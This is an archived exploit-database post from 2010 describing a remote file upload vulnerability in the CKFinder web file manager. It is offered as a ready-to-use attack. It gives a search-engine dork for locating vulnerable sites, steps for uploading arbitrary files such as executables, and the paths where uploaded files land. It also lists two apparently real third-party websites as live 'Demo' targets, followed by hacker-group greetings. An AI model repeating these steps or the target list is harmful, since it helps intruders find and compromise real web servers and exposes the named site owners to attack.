Home / os / win7

[webapps / 0day] - Ckfinder remote file Upload Vulnerability

Posted on 03 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Ckfinder remote file Upload Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Ckfinder remote file Upload Vulnerability by Net.Edit0r in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=========================================
Ckfinder remote file Upload Vulnerability
=========================================

#Author: Net.Edit0r

#Dork : inurl:&quot;/ckfinder/ckfinder.html&quot;


#Software Link: http://www.ckfinder.com/

#Platform :linux/php

#Exploit : http://target.com

#http://target.com/[path]/ckfinder/ckfinder.html

#Select the &quot;Upload&quot; To use = txt . xml . exe . mp3 . and ..

#http://target.com/[path]/ckfinder/ckfinder.html

#File : http://target.com/[path]/ckfinder/userfiles/files/Name File

#OR

#http://target.com/[path]/ckfinder/files/Name File

Demo : http://www.tenants.bc.ca/ckfinder/ckfinder.html

Demo : http://www.strichacht.at/libs/ckfinder/ckfinder.html

########################################### Iranian HackerZ
##############################################
#
#
# Spical Thanks To : Darkcoder ~ H-SK33PY ~ S3Ri0uS ~ b3hz4d ~ Classic
~ AmIr-MaGic
#
#
# Greetz : Ashiyane.Org ~ Datacoders.Org ~ Houseofhackers.Net #Ibh
#
##########################################################################################################


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-03]</pre></body></html>

 

TOP

Malware :

Exploits :